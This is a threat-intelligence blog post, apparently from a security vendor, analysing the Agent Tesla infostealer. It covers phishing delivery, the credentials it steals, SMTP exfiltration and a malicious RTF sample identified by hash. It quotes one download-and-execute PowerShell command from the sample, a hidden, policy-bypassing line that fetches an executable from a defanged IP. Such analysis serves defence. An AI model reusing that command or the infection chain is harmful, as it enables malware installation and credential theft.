Agent Tesla: The RAT Spyware and Infostealer
Agent Tesla is a Malware-as-a-Service Trojan that steals user information and exfiltrates it to the threat actors
Agent Tesla infects systems generally through a phishing email with an attachment. Users are tricked into opening the attachment, thereby installing the malware. Once installed, Agent Tesla captures sensitive data from the infected system and sends it to a predetermined external location.
About the Threat:
Agent Tesla was first observed in late 2014. It is a known malware-as-a-service spyware focused on stealing sensitive information from a victim’s device.
Agent Tesla uses email as the vector for initial infection. The email uses social engineering tactics to appear legitimate. Some samples appear to contain business enquiries while others contain shipment tracking information that are convincing enough to lure the unsuspecting victim into opening the attachment. On opening, the attachment downloads the malware installer which then establishes external communication and downloads the actual payload. This whole process uses obfuscation to escape detection. Once the installation is complete, two way communication with the CNC is established and information from the infected system is exfiltrated.
Some of the credentials it steals and exfiltrates are –
Credentials from System Registry
Saved credentials from a range of email, messaging applications and commonly used browsers
Credentials of files in VPN, download managers and FTP clients
Keyboard inputs (through a key-logger)
The trojan generally seems to use CVE-2017-8570 exploit successfully. Another characteristic is the use of SMTP for data exfiltration.
Given that Agent Tesla gives full access of the affected system to the threat actors, it has far reaching repercussions on the victims. Ranging from stolen identity, restriction of access to system resources, launch of further attacks using the victim’s credentials are some of the typical actions of Agent Tesla.
SecneurX’s Analysis of the Modus Operandi
SecneurX's acquisition engine gathered artifacts and examined them using SecneurX Advanced Malware Analysis Platform. This platform provides unrivalled visibility and context to advanced threats with its extensive malware analysis & detection capabilities, in addition to generating a detailed report describing the malware behavior. Extracted Indicators of Compromise (IOCs) and human-readable behavior reports can be used to augment existing intelligence data and help to give ‘context’ to IPs, domains, URLs, registry, process activity, file names and hashes. One such analysis of an artifact is described by our analysts here.
The artifact analysed is SHA256=2ba5487668103c62614cfb4288d1c26a8d5172352b3b34363618c8c91c810818, a document named ‘Fund Released Detail.doc’. This was a Rich Text Format (RTF) file obtained from an email attachment.
The trojan’s behaviour is explained in the following steps.
Once the file attachment is opened, it runs a script to download the installer. This can be seen in the rtf dump. Here, object 3 and 5 in the image are the same.
Fig1. Shows contents of the rtf dump highlighting the dumped files
The obfuscated script is executed and runs the following command -
powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('http[:]//173[.]232[.]204[.]89/ikik[.]exe','%APPDATA%\ikik.exe');Start-Process '%APPDATA%\mb.exe'"
Fig 2. Obfuscated script in the dumped files
Communication with the CNC is established and the actual payload is downloaded from the CNC.
Fig 3. Downloaded mb.exe from the CNC
This payload completes the download of the malware and executes it.
Once the execution is completed, it grants full control of the affected system to the CNC. User credentials and other information are accesed and the data is exfiltrated to the CNC. The use of SMTP to exfiltrate the data is to be noted here.
Fig 4. User credentials captured for exfiltration
Fig 5. User credentials captured for exfiltration
The full behavior report for the sample can be found in the following URL.
Fig 6. The malware exhibiting living off the land and persistence mechanism
Next stage Payload Sha256: